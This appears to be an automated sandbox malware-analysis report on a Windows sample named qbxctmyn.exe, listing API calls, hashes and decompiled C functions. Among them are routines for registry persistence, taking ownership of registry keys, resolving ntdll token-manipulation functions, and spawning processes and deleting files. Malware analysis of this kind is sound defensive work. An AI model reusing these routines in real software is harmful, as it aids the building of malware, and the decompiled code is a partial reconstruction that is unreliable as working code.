                                                                                • Snapshot File: hcaresult_17_2_e30000_qbxctmyn.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AllocVirtual$HandleMemoryModuleProcessWrite
                                                                                • String ID:
                                                                                • API String ID: 1965334864-0
                                                                                • Opcode ID: f6d5bfc494c97751726a91e8fcfc29ef8439432d9fc6ff92f654e37a29c1b935
                                                                                • Instruction ID: 7b03119296311c1e8bf78cd54d1105b94a1de8210c4c3bf9c3b3c19e411ce457
                                                                                • Opcode Fuzzy Hash: f6d5bfc494c97751726a91e8fcfc29ef8439432d9fc6ff92f654e37a29c1b935
                                                                                • Instruction Fuzzy Hash: 63115471600218BFDB115F75DC4AF9B3FA8EB057A9F118034FA05A7251D7B1DD00C6A4
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • ExitProcess.KERNEL32 ref: 00E39E6D
                                                                                • lstrcpy.KERNEL32(?,00000000), ref: 00E39FE1
                                                                                • lstrcat.KERNEL32(?,?), ref: 00E39FF2
                                                                                • lstrcat.KERNEL32(?,0041070C), ref: 00E3A004
                                                                                • GetFileAttributesExA.KERNEL32(?,?,?), ref: 00E3A054
                                                                                • DeleteFileA.KERNEL32(?), ref: 00E3A09F
                                                                                • GetEnvironmentVariableA.KERNEL32(00000000,?,?,?,?,000001F4), ref: 00E3A0D6
                                                                                • lstrcpy.KERNEL32 ref: 00E3A12F
                                                                                • lstrlen.KERNEL32(00000022), ref: 00E3A13C
                                                                                • GetTempPathA.KERNEL32(000001F4,?), ref: 00E39F13
                                                                                  • Part of subcall function 00E37029: GetVolumeInformationA.KERNEL32(?,00000000,00000000,\%},00000000,00000000,00000000,00000000), ref: 00E37081
                                                                                  • Part of subcall function 00E36F30: GetModuleHandleA.KERNEL32(00410380,00410670,00000000,\\.\pipe\seokopfr,00E37043), ref: 00E36F4E
                                                                                  • Part of subcall function 00E36F30: GetProcAddress.KERNEL32(00000000), ref: 00E36F55
                                                                                  • Part of subcall function 00E36F30: GetSystemDirectoryA.KERNEL32(C:\Windows\SysWOW64\,00000104), ref: 00E36F7B
                                                                                  • Part of subcall function 00E36F30: GetWindowsDirectoryA.KERNEL32(C:\Windows\SysWOW64\,00000104,?,00000000), ref: 00E36F92
                                                                                • RegOpenKeyExA.ADVAPI32(80000001,00000000,?,?,?,00000103,?,?,?,?), ref: 00E3A1A2
                                                                                • RegSetValueExA.ADVAPI32(?,00000001,?,00000001,?,000001F5,?,?,?,00000103,?,?,?,?), ref: 00E3A1C5
                                                                                • GetModuleHandleA.KERNEL32(?,?,00000104,?,?,00000010,?,?,00000044,?,?,?,?,?,?,00000103), ref: 00E3A214
                                                                                • GetModuleFileNameA.KERNEL32(00000000,?,?,00000104,?,?,00000010,?,?,00000044), ref: 00E3A21B
                                                                                • GetDriveTypeA.KERNEL32(?), ref: 00E3A265
                                                                                • lstrcat.KERNEL32(?,00000000), ref: 00E3A29F
                                                                                • lstrcat.KERNEL32(?,00410A34), ref: 00E3A2C5
                                                                                • lstrcat.KERNEL32(?,00000022), ref: 00E3A2D9
                                                                                • lstrcat.KERNEL32(?,00410A34), ref: 00E3A2F4
                                                                                • wsprintfA.USER32 ref: 00E3A31D
                                                                                • lstrcat.KERNEL32(?,00000000), ref: 00E3A345
                                                                                • lstrcat.KERNEL32(?,?), ref: 00E3A364
                                                                                • CreateProcessA.KERNEL32(?,?,?,?,?,08000000,?,?,?,?,?,?,00000104,?,?,00000010), ref: 00E3A387
                                                                                • DeleteFileA.KERNEL32(?,?,?,?,?,?,08000000,?,?,?,?,?,?,00000104,?), ref: 00E3A398
                                                                                • RegCloseKey.ADVAPI32(?,?,00000001,?,000001F5,?,?,?,00000103,?,?,?,?), ref: 00E3A1D1
                                                                                  • Part of subcall function 00E39966: RegOpenKeyExA.ADVAPI32(80000001,00000000), ref: 00E3999D
                                                                                  • Part of subcall function 00E39966: RegDeleteValueA.ADVAPI32(?,00000000), ref: 00E399BD
                                                                                  • Part of subcall function 00E39966: RegCloseKey.ADVAPI32(?), ref: 00E399C6
                                                                                • GetModuleHandleA.KERNEL32(?,?,0000012C), ref: 00E3A3DB
                                                                                • GetModuleFileNameA.KERNEL32(00000000,?,?,0000012C), ref: 00E3A3E2
                                                                                • GetDriveTypeA.KERNEL32(00000022), ref: 00E3A41D
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.310875987.0000000000E30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_e30000_qbxctmyn.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: lstrcat$FileModule$DeleteHandle$CloseDirectoryDriveNameOpenProcessTypeValuelstrcpy$AddressAttributesCreateEnvironmentExitInformationPathProcSystemTempVariableVolumeWindowslstrlenwsprintf
                                                                                • String ID: "$"$"$D$P$\
                                                                                • API String ID: 1653845638-2605685093
                                                                                • Opcode ID: 367b9be05492a2edfb885d1a7c41413b002776b69c7dc48c576c8fe787930bc5
                                                                                • Instruction ID: 97090a3ee55fada1b972752bfd25c187dc78c30b99690d1352ef3fc76e0ec886
                                                                                • Opcode Fuzzy Hash: 367b9be05492a2edfb885d1a7c41413b002776b69c7dc48c576c8fe787930bc5
                                                                                • Instruction Fuzzy Hash: DDF13FB1D40259AEDB21DBA08C4DEEF7BBCAB08304F0450B6F645F2152E7B58A84CF65
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 100%
                                                                                			E00401000() {
                                                                                				struct HINSTANCE__* _t2;
                                                                                				_Unknown_base(*)()* _t3;
                                                                                				signed int _t4;
                                                                                				struct HINSTANCE__* _t5;
                                                                                				_Unknown_base(*)()* _t6;
                                                                                				_Unknown_base(*)()* _t7;
                                                                                				_Unknown_base(*)()* _t8;
                                                                                				struct HINSTANCE__* _t9;
                                                                                				_Unknown_base(*)()* _t10;
                                                                                				_Unknown_base(*)()* _t11;
                                                                                				_Unknown_base(*)()* _t12;
                                                                                				struct HINSTANCE__* _t13;
                                                                                				_Unknown_base(*)()* _t14;
                                                                                				_Unknown_base(*)()* _t15;
                                                                                				_Unknown_base(*)()* _t16;
                                                                                				struct HINSTANCE__* _t17;
                                                                                				_Unknown_base(*)()* _t18;
                                                                                				_Unknown_base(*)()* _t19;
                                                                                				_Unknown_base(*)()* _t20;
                                                                                				struct HINSTANCE__* _t21;
                                                                                				_Unknown_base(*)()* _t22;
                                                                                				_Unknown_base(*)()* _t23;
                                                                                				struct HINSTANCE__* _t25;
                                                                                				struct HINSTANCE__* _t26;
                                                                                				struct HINSTANCE__* _t27;
                                                                                				struct HINSTANCE__* _t28;
                                                                                				struct HINSTANCE__* _t29;
                                                                                				struct HINSTANCE__* _t30;
                                                                                				struct HINSTANCE__* _t31;
                                                                                				struct HINSTANCE__* _t32;
                                                                                				struct HINSTANCE__* _t33;
                                                                                				signed int _t34;
                                                                                				signed int _t35;
                                                                                
                                                                                				_t2 =  *0x413918; // 0x0
                                                                                				_t35 = _t34 | 0xffffffff;
                                                                                				if(_t2 != 0) {
                                                                                					L3:
                                                                                					if( *0x41391c == 0 ||  *0x413920 == 0 ||  *0x413924 == 0 ||  *0x413928 == 0 ||  *0x41392c == 0 ||  *0x413930 == 0 ||  *0x413934 == 0 ||  *0x413938 == 0 ||  *0x41393c == 0 ||  *0x413940 == 0 ||  *0x413944 == 0 ||  *0x413948 == 0 ||  *0x41394c == 0 ||  *0x413950 == 0 ||  *0x413954 == 0) {
                                                                                						_t3 = GetProcAddress(_t2, "RtlExpandEnvironmentStrings_U");
                                                                                						 *0x41391c = _t3;
                                                                                						if(_t3 == 0) {
                                                                                							L34:
                                                                                							_t4 = _t35;
                                                                                						} else {
                                                                                							_t5 =  *0x413918; // 0x0
                                                                                							_t35 = 0xfffffffe;
                                                                                							_t6 = GetProcAddress(_t5, "RtlSetLastWin32Error");
                                                                                							 *0x413920 = _t6;
                                                                                							if(_t6 == 0) {
                                                                                								goto L34;
                                                                                							} else {
                                                                                								_t25 =  *0x413918; // 0x0
                                                                                								_t35 = 0xfffffffd;
                                                                                								_t7 = GetProcAddress(_t25, "NtTerminateProcess");
                                                                                								 *0x413924 = _t7;
                                                                                								if(_t7 == 0) {
                                                                                									goto L34;
                                                                                								} else {
                                                                                									_t30 =  *0x413918; // 0x0
                                                                                									_t35 = 0xfffffffc;
                                                                                									_t8 = GetProcAddress(_t30, "RtlFreeSid");
                                                                                									 *0x413928 = _t8;
                                                                                									if(_t8 == 0) {
                                                                                										goto L34;
                                                                                									} else {
                                                                                										_t9 =  *0x413918; // 0x0
                                                                                										_t35 = 0xfffffffb;
                                                                                										_t10 = GetProcAddress(_t9, "RtlInitUnicodeString");
                                                                                										 *0x41392c = _t10;
                                                                                										if(_t10 == 0) {
                                                                                											goto L34;
                                                                                										} else {
                                                                                											_t26 =  *0x413918; // 0x0
                                                                                											_t35 = 0xfffffffa;
                                                                                											_t11 = GetProcAddress(_t26, "NtSetInformationThread");
                                                                                											 *0x413930 = _t11;
                                                                                											if(_t11 == 0) {
                                                                                												goto L34;
                                                                                											} else {
                                                                                												_t31 =  *0x413918; // 0x0
                                                                                												_t35 = 0xfffffff9;
                                                                                												_t12 = GetProcAddress(_t31, "NtSetInformationToken");
                                                                                												 *0x413934 = _t12;
                                                                                												if(_t12 == 0) {
                                                                                													goto L34;
                                                                                												} else {
                                                                                													_t13 =  *0x413918; // 0x0
                                                                                													_t35 = 0xfffffff8;
                                                                                													_t14 = GetProcAddress(_t13, "RtlNtStatusToDosError");
                                                                                													 *0x413938 = _t14;
                                                                                													if(_t14 == 0) {
                                                                                														goto L34;
                                                                                													} else {
                                                                                														_t27 =  *0x413918; // 0x0
                                                                                														_t35 = 0xfffffff7;
                                                                                														_t15 = GetProcAddress(_t27, "NtClose");
                                                                                														 *0x41393c = _t15;
                                                                                														if(_t15 == 0) {
                                                                                															goto L34;
                                                                                														} else {
                                                                                															_t32 =  *0x413918; // 0x0
                                                                                															_t35 = 0xfffffff6;
                                                                                															_t16 = GetProcAddress(_t32, "NtOpenProcessToken");
                                                                                															 *0x413940 = _t16;
                                                                                															if(_t16 == 0) {
                                                                                																goto L34;
                                                                                															} else {
                                                                                																_t17 =  *0x413918; // 0x0
                                                                                																_t35 = 0xfffffff5;
                                                                                																_t18 = GetProcAddress(_t17, "NtDuplicateToken");
                                                                                																 *0x413944 = _t18;
                                                                                																if(_t18 == 0) {
                                                                                																	goto L34;
                                                                                																} else {
                                                                                																	_t28 =  *0x413918; // 0x0
                                                                                																	_t35 = 0xfffffff4;
                                                                                																	_t19 = GetProcAddress(_t28, "RtlAllocateAndInitializeSid");
                                                                                																	 *0x413948 = _t19;
                                                                                																	if(_t19 == 0) {
                                                                                																		goto L34;
                                                                                																	} else {
                                                                                																		_t33 =  *0x413918; // 0x0
                                                                                																		_t35 = 0xfffffff3;
                                                                                																		_t20 = GetProcAddress(_t33, "NtFilterToken");
                                                                                																		 *0x41394c = _t20;
                                                                                																		if(_t20 == 0) {
                                                                                																			goto L34;
                                                                                																		} else {
                                                                                																			_t21 =  *0x413918; // 0x0
                                                                                																			_t35 = 0xfffffff2;
                                                                                																			_t22 = GetProcAddress(_t21, "RtlLengthSid");
                                                                                																			 *0x413950 = _t22;
                                                                                																			if(_t22 == 0) {
                                                                                																				goto L34;
                                                                                																			} else {
                                                                                																				_t29 =  *0x413918; // 0x0
                                                                                																				_t35 = 0xfffffff1;
                                                                                																				_t23 = GetProcAddress(_t29, "NtQueryInformationToken");
                                                                                																				 *0x413954 = _t23;
                                                                                																				_t1 = _t35 + 0x10; // 0x100000001
                                                                                																				_t4 = _t1;
                                                                                																				if(_t23 == 0) {
                                                                                																					goto L34;
                                                                                																				}
                                                                                																			}
                                                                                																		}
                                                                                																	}
                                                                                																}
                                                                                															}
                                                                                														}
                                                                                													}
                                                                                												}
                                                                                											}
                                                                                										}
                                                                                									}
                                                                                								}
                                                                                							}
                                                                                						}
                                                                                						return _t4;
                                                                                					} else {
                                                                                						return 1;
                                                                                					}
                                                                                				} else {
                                                                                					_t2 = LoadLibraryA("ntdll.dll");
                                                                                					 *0x413918 = _t2;
                                                                                					if(_t2 != 0) {
                                                                                						goto L3;
                                                                                					} else {
                                                                                						return _t2;
                                                                                					}
                                                                                				}
                                                                                			}
                                                                                0x00401000
                                                                                0x00401006
                                                                                0x0040100b
                                                                                0x00401023
                                                                                0x0040102a
                                                                                0x004010c2
                                                                                0x004010c4
                                                                                0x004010cb
                                                                                0x0040127b
                                                                                0x0040127b
                                                                                0x004010d1
                                                                                0x004010d1
                                                                                0x004010dc
                                                                                0x004010e1
                                                                                0x004010e3
                                                                                0x004010ea
                                                                                0x00000000
                                                                                0x004010f0
                                                                                0x004010f0
                                                                                0x004010fc
                                                                                0x00401101
                                                                                0x00401103
                                                                                0x0040110a
                                                                                0x00000000
                                                                                0x00401110
                                                                                0x00401110
                                                                                0x0040111c
                                                                                0x00401121
                                                                                0x00401123
                                                                                0x0040112a
                                                                                0x00000000
                                                                                0x00401130
                                                                                0x00401130
                                                                                0x0040113b
                                                                                0x00401140
                                                                                0x00401142
                                                                                0x00401149
                                                                                0x00000000
                                                                                0x0040114f
                                                                                0x0040114f
                                                                                0x0040115b
                                                                                0x00401160
                                                                                0x00401162
                                                                                0x00401169
                                                                                0x00000000
                                                                                0x0040116f
                                                                                0x0040116f
                                                                                0x0040117b
                                                                                0x00401180
                                                                                0x00401182
                                                                                0x00401189
                                                                                0x00000000
                                                                                0x0040118f
                                                                                0x0040118f
                                                                                0x0040119a
                                                                                0x0040119f
                                                                                0x004011a1
                                                                                0x004011a8
                                                                                0x00000000
                                                                                0x004011ae
                                                                                0x004011ae
                                                                                0x004011ba
                                                                                0x004011bf
                                                                                0x004011c1
                                                                                0x004011c8
                                                                                0x00000000
                                                                                0x004011ce
                                                                                0x004011ce
                                                                                0x004011da
                                                                                0x004011df
                                                                                0x004011e1
                                                                                0x004011e8
                                                                                0x00000000
                                                                                0x004011ee
                                                                                0x004011ee
                                                                                0x004011f9
                                                                                0x004011fe
                                                                                0x00401200
                                                                                0x00401207
                                                                                0x00000000
                                                                                0x00401209
                                                                                0x00401209
                                                                                0x00401215
                                                                                0x0040121a
                                                                                0x0040121c
                                                                                0x00401223
                                                                                0x00000000
                                                                                0x00401225
                                                                                0x00401225
                                                                                0x00401231
                                                                                0x00401236
                                                                                0x00401238
                                                                                0x0040123f
                                                                                0x00000000
                                                                                0x00401241
                                                                                0x00401241
                                                                                0x0040124c
                                                                                0x00401251
                                                                                0x00401253
                                                                                0x0040125a
                                                                                0x00000000
                                                                                0x0040125c
                                                                                0x0040125c
                                                                                0x00401268
                                                                                0x0040126d
                                                                                0x0040126f
                                                                                0x00401276
                                                                                0x00401276
                                                                                0x00401279
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00401279
                                                                                0x0040125a
                                                                                0x0040123f
                                                                                0x00401223
                                                                                0x00401207
                                                                                0x004011e8
                                                                                0x004011c8
                                                                                0x004011a8
                                                                                0x00401189
                                                                                0x00401169
                                                                                0x00401149
                                                                                0x0040112a
                                                                                0x0040110a
                                                                                0x004010ea
                                                                                0x0040127f
                                                                                0x004010ae
                                                                                0x004010b4
                                                                                0x004010b4
                                                                                0x0040100d
                                                                                0x00401012
                                                                                0x00401018
                                                                                0x0040101f
                                                                                0x00000000
                                                                                0x00401022
                                                                                0x00401022
                                                                                0x00401022
                                                                                0x0040101f

                                                                                APIs
                                                                                • LoadLibraryA.KERNEL32(ntdll.dll,00000000,00401839,00409646), ref: 00401012
                                                                                • GetProcAddress.KERNEL32(00000000,RtlExpandEnvironmentStrings_U), ref: 004010C2
                                                                                • GetProcAddress.KERNEL32(00000000,RtlSetLastWin32Error), ref: 004010E1
                                                                                • GetProcAddress.KERNEL32(00000000,NtTerminateProcess), ref: 00401101
                                                                                • GetProcAddress.KERNEL32(00000000,RtlFreeSid), ref: 00401121
                                                                                • GetProcAddress.KERNEL32(00000000,RtlInitUnicodeString), ref: 00401140
                                                                                • GetProcAddress.KERNEL32(00000000,NtSetInformationThread), ref: 00401160
                                                                                • GetProcAddress.KERNEL32(00000000,NtSetInformationToken), ref: 00401180
                                                                                • GetProcAddress.KERNEL32(00000000,RtlNtStatusToDosError), ref: 0040119F
                                                                                • GetProcAddress.KERNEL32(00000000,NtClose), ref: 004011BF
                                                                                • GetProcAddress.KERNEL32(00000000,NtOpenProcessToken), ref: 004011DF
                                                                                • GetProcAddress.KERNEL32(00000000,NtDuplicateToken), ref: 004011FE
                                                                                • GetProcAddress.KERNEL32(00000000,RtlAllocateAndInitializeSid), ref: 0040121A
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.310301101.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_qbxctmyn.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AddressProc$LibraryLoad
                                                                                • String ID: NtClose$NtDuplicateToken$NtFilterToken$NtOpenProcessToken$NtQueryInformationToken$NtSetInformationThread$NtSetInformationToken$NtTerminateProcess$RtlAllocateAndInitializeSid$RtlExpandEnvironmentStrings_U$RtlFreeSid$RtlInitUnicodeString$RtlLengthSid$RtlNtStatusToDosError$RtlSetLastWin32Error$ntdll.dll
                                                                                • API String ID: 2238633743-3228201535
                                                                                • Opcode ID: 099c329b46637f9171a1ca57a4c5e0107e32006a0b8f6d8903d04b45664d461e
                                                                                • Instruction ID: c8dd2db2df3f08e17c6117e54d1286841a2c4197db930f8a9693796d5e259140
                                                                                • Opcode Fuzzy Hash: 099c329b46637f9171a1ca57a4c5e0107e32006a0b8f6d8903d04b45664d461e
                                                                                • Instruction Fuzzy Hash: 2F5100B1662641A6D7118F69EC84BD23AE86748372F14837B9520F62F0D7F8CAC1CB5D
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 91%
                                                                                			E0040B211(FILETIME* _a4, CHAR* _a8, signed int _a12) {
                                                                                				struct _FILETIME _v12;
                                                                                				struct _SYSTEMTIME _v28;
                                                                                				CHAR* _v32;
                                                                                				CHAR* _v36;
                                                                                				CHAR* _v40;
                                                                                				CHAR* _v44;
                                                                                				CHAR* _v48;
                                                                                				CHAR* _v52;
                                                                                				CHAR* _v56;
                                                                                				CHAR* _v60;
                                                                                				CHAR* _v64;
                                                                                				CHAR* _v68;
                                                                                				CHAR* _v72;
                                                                                				CHAR* _v76;
                                                                                				CHAR* _v80;
                                                                                				CHAR* _v84;
                                                                                				CHAR* _v88;
                                                                                				CHAR* _v92;
                                                                                				CHAR* _v96;
                                                                                				CHAR* _v100;
                                                                                				CHAR* _v104;
                                                                                				struct _TIME_ZONE_INFORMATION _v276;
                                                                                				long _t77;
                                                                                				signed int _t80;
                                                                                				signed int _t93;
                                                                                				signed int _t101;
                                                                                				signed int _t102;
                                                                                				CHAR* _t103;
                                                                                				signed int _t104;
                                                                                				signed short _t106;
                                                                                				signed short _t109;
                                                                                				signed int _t114;
                                                                                				signed int _t115;
                                                                                				void* _t117;
                                                                                
                                                                                				_v56 = "Sun";
                                                                                				_v52 = "Mon";
                                                                                				_v48 = "Tue";
                                                                                				_v44 = "Wed";
                                                                                				_v40 = "Thu";
                                                                                				_v36 = "Fri";
                                                                                				_v32 = "Sat";
                                                                                				_v104 = "Jan";
                                                                                				_v100 = "Feb";
                                                                                				_v96 = "Mar";
                                                                                				_v92 = "Apr";
                                                                                				_v88 = "May";
                                                                                				_v84 = "Jun";
                                                                                				_v80 = "Jul";
                                                                                				_v76 = "Aug";
                                                                                				_v72 = "Sep";
                                                                                				_v68 = "Oct";
                                                                                				_v64 = "Nov";
                                                                                				_v60 = "Dec";
                                                                                				if(_a4 != 0) {
                                                                                					FileTimeToLocalFileTime(_a4,  &_v12);
                                                                                					FileTimeToSystemTime( &_v12,  &_v28);
                                                                                				} else {
                                                                                					GetLocalTime( &_v28);
                                                                                				}
                                                                                				_t114 = _a12;
                                                                                				if(_t114 != 0) {
                                                                                					SystemTimeToFileTime( &_v28,  &_v12);
                                                                                					_t93 = E0040ECA5();
                                                                                					if(_t114 <= 0) {
                                                                                						_t104 = _t93 %  ~_t114 * 0x23c34600;
                                                                                						_v12.dwLowDateTime = _v12.dwLowDateTime - _t104;
                                                                                						asm("sbb [ebp-0x4], ebx");
                                                                                					} else {
                                                                                						_t104 = _t93 % _t114 * 0x23c34600;
                                                                                						_v12.dwLowDateTime = _v12.dwLowDateTime + _t104;
                                                                                						asm("adc [ebp-0x4], ebx");
                                                                                					}
                                                                                					FileTimeToSystemTime( &_v12,  &_v28);
                                                                                				}
                                                                                				_v276.Bias = 0;
                                                                                				_t77 = GetTimeZoneInformation( &_v276);
                                                                                				_t101 = _v276.Bias;
                                                                                				if(_t77 == 2) {
                                                                                					_t101 = _t101 + _v276.DaylightBias;
                                                                                				}
                                                                                				_t102 =  ~_t101;
                                                                                				asm("cdq");
                                                                                				_t80 = (_t102 ^ _t104) - _t104;
                                                                                				if(_v28.wDayOfWeek > 6) {
                                                                                					_t109 = 6;
                                                                                					_v28.wDayOfWeek = _t109;
                                                                                				}
                                                                                				if(_v28.wMonth == 0) {
                                                                                					_v28.wMonth = 1;
                                                                                				}
                                                                                				if(_v28.wMonth > 0xc) {
                                                                                					_t106 = 0xc;
                                                                                					_v28.wMonth = _t106;
                                                                                				}
                                                                                				_t103 = "+";
                                                                                				if(_t102 < 0) {
                                                                                					_t103 = "-";
                                                                                				}
                                                                                				_t115 = 0x3c;
                                                                                				asm("cdq");
                                                                                				return wsprintfA(_a8, "%s, %u %s %u %.2u:%.2u:%.2u %s%.2u%.2u",  *((intOrPtr*)(_t117 + (_v28.wDayOfWeek & 0x0000ffff) * 4 - 0x34)), _v28.wDay & 0x0000ffff,  *((intOrPtr*)(_t117 + (_v28.wMonth & 0x0000ffff) * 4 - 0x68)), _v28.wYear & 0x0000ffff, _v28.wHour & 0x0000ffff, _v28.wMinute & 0x0000ffff, _v28.wSecond & 0x0000ffff, _t103, _t80 / _t115, _t80 % _t115);
                                                                                			}

                                                                                0x0040b225
                                                                                0x0040b22c
                                                                                0x0040b233
                                                                                0x0040b23a
                                                                                0x0040b241
                                                                                0x0040b248
                                                                                0x0040b24f
                                                                                0x0040b256
                                                                                0x0040b25d
                                                                                0x0040b264
                                                                                0x0040b26b
                                                                                0x0040b272
                                                                                0x0040b279
                                                                                0x0040b280
                                                                                0x0040b287
                                                                                0x0040b28e
                                                                                0x0040b295
                                                                                0x0040b29c
                                                                                0x0040b2a3
                                                                                0x0040b2ad
                                                                                0x0040b2c2
                                                                                0x0040b2d0
                                                                                0x0040b2af
                                                                                0x0040b2b3
                                                                                0x0040b2b3
                                                                                0x0040b2d2
                                                                                0x0040b2d7
                                                                                0x0040b2e1
                                                                                0x0040b2e7
                                                                                0x0040b2f0
                                                                                0x0040b306
                                                                                0x0040b30c
                                                                                0x0040b30f
                                                                                0x0040b2f2
                                                                                0x0040b2f4
                                                                                0x0040b2fa
                                                                                0x0040b2fd
                                                                                0x0040b2fd
                                                                                0x0040b31a
                                                                                0x0040b31a
                                                                                0x0040b323
                                                                                0x0040b329
                                                                                0x0040b32f
                                                                                0x0040b338
                                                                                0x0040b33a
                                                                                0x0040b33a
                                                                                0x0040b33d
                                                                                0x0040b341
                                                                                0x0040b344
                                                                                0x0040b34b
                                                                                0x0040b34f
                                                                                0x0040b350
                                                                                0x0040b350
                                                                                0x0040b358
                                                                                0x0040b35d
                                                                                0x0040b35d
                                                                                0x0040b366
                                                                                0x0040b36a
                                                                                0x0040b36b
                                                                                0x0040b36b
                                                                                0x0040b371
                                                                                0x0040b376
                                                                                0x0040b378
                                                                                0x0040b378
                                                                                0x0040b37f
                                                                                0x0040b380
                                                                                0x0040b3c4

                                                                                APIs
                                                                                • GetLocalTime.KERNEL32(0003E800,?,0003E800,00000000), ref: 0040B2B3
                                                                                • FileTimeToLocalFileTime.KERNEL32(00000000,00000000,?,0003E800,00000000), ref: 0040B2C2
                                                                                • FileTimeToSystemTime.KERNEL32(00000000,0003E800), ref: 0040B2D0
                                                                                • SystemTimeToFileTime.KERNEL32(0003E800,00000000), ref: 0040B2E1
                                                                                • FileTimeToSystemTime.KERNEL32(00000000,0003E800), ref: 0040B31A
                                                                                • GetTimeZoneInformation.KERNEL32(?), ref: 0040B329
                                                                                • wsprintfA.USER32 ref: 0040B3B7
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.310301101.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_qbxctmyn.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Time$File$System$Local$InformationZonewsprintf
                                                                                • String ID: %s, %u %s %u %.2u:%.2u:%.2u %s%.2u%.2u$Apr$Aug$Dec$Feb$Fri$Jan$Jul$Jun$Mar$May$Mon$Nov$Oct$Sat$Sep$Sun$Thu$Tue$Wed
                                                                                • API String ID: 766114626-2976066047
                                                                                • Opcode ID: fbb2cc535003bdd2a03704f06e43c86ec17b275768f9954b8d174276db173d5b
                                                                                • Instruction ID: 3cccae2c5b68faf9d5e65ebc3321ef0303f497beb4f825406ae493c25d793f5b
                                                                                • Opcode Fuzzy Hash: fbb2cc535003bdd2a03704f06e43c86ec17b275768f9954b8d174276db173d5b
                                                                                • Instruction Fuzzy Hash: D8510EB1D0021CAADF18DFD5D8495EEBBB9EF48304F10856BE501B6250E7B84AC9CF98
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • RegOpenKeyExA.ADVAPI32(?,?,00000000,000E0100,?), ref: 00E37D21
                                                                                • GetUserNameA.ADVAPI32(?,?), ref: 00E37D46
                                                                                • LookupAccountNameA.ADVAPI32(00000000,?,?,?,?,?,?), ref: 00E37D7D
                                                                                • RegGetKeySecurity.ADVAPI32(?,00000005,?,?), ref: 00E37DA2
                                                                                • GetSecurityDescriptorOwner.ADVAPI32(?,?,?), ref: 00E37DC0
                                                                                • EqualSid.ADVAPI32(?,?), ref: 00E37DD1
                                                                                • LocalAlloc.KERNEL32(00000040,00000014), ref: 00E37DE5
                                                                                • InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 00E37DF3
                                                                                • SetSecurityDescriptorOwner.ADVAPI32(00000000,?,00000000), ref: 00E37E03
                                                                                • RegSetKeySecurity.ADVAPI32(?,00000001,00000000), ref: 00E37E12
                                                                                • LocalFree.KERNEL32(00000000), ref: 00E37E19
                                                                                • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00E37E35
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.310875987.0000000000E30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_e30000_qbxctmyn.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Security$Descriptor$LocalNameOwner$AccountAllocDaclEqualFreeInitializeLookupOpenUser
                                                                                • String ID: C:\Windows\SysWOW64\htdzdeug\qbxctmyn.exe$D
                                                                                • API String ID: 2976863881-60433687
                                                                                • Opcode ID: 1a53823342927d1e4650e54f1beed8d9b04cc787a6d03e02cd47dd5285ddf864
                                                                                • Instruction ID: e83ae5f0499c8f5547459415c8b9e8b3ab9b0fb459d3ae513504b03db5ec1d92
                                                                                • Opcode Fuzzy Hash: 1a53823342927d1e4650e54f1beed8d9b04cc787a6d03e02cd47dd5285ddf864
                                                                                • Instruction Fuzzy Hash: 2FA14DB1900219AFDF219FA1DD88BEEBFB9FB08304F0480A9F555F2150DB758A84CB64
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 99%
                                                                                			E00407A95(void* _a4, char* _a8, signed int _a12) {
                                                                                				int _v8;
                                                                                				void* _v12;
                                                                                				void* _v16;
                                                                                				void* _v20;
                                                                                				int _v24;
                                                                                				void* _v28;
                                                                                				struct _ACL* _v32;
                                                                                				long _v36;
                                                                                				long _v40;
                                                                                				long _v44;
                                                                                				int _v48;
                                                                                				int _v52;
                                                                                				union _SID_NAME_USE _v56;
                                                                                				int _v60;
                                                                                				int _v64;
                                                                                				void _v132;
                                                                                				char _v388;
                                                                                				char _v516;
                                                                                				struct _SECURITY_DESCRIPTOR _v1540;
                                                                                				void* _t95;
                                                                                				void* _t104;
                                                                                				void* _t107;
                                                                                				void* _t111;
                                                                                				void* _t116;
                                                                                				struct _ACL* _t117;
                                                                                				void* _t118;
                                                                                				void* _t120;
                                                                                				void* _t122;
                                                                                				void* _t123;
                                                                                				void* _t125;
                                                                                				char* _t126;
                                                                                				void* _t130;
                                                                                				void* _t134;
                                                                                				void* _t135;
                                                                                				signed int _t136;
                                                                                				void* _t143;
                                                                                				void* _t146;
                                                                                				int _t148;
                                                                                				int _t151;
                                                                                				char* _t158;
                                                                                				void** _t159;
                                                                                				void* _t161;
                                                                                				void* _t164;
                                                                                				signed int _t172;
                                                                                				void* _t173;
                                                                                				char* _t174;
                                                                                				void* _t175;
                                                                                				void* _t176;
                                                                                
                                                                                				_v32 = 0;
                                                                                				_v12 = 0;
                                                                                				_v28 = 0;
                                                                                				if(RegOpenKeyExA(_a4, _a8, 0, 0xe0100,  &_v28) != 0) {
                                                                                					return 0;
                                                                                				}
                                                                                				_v40 = 0x80;
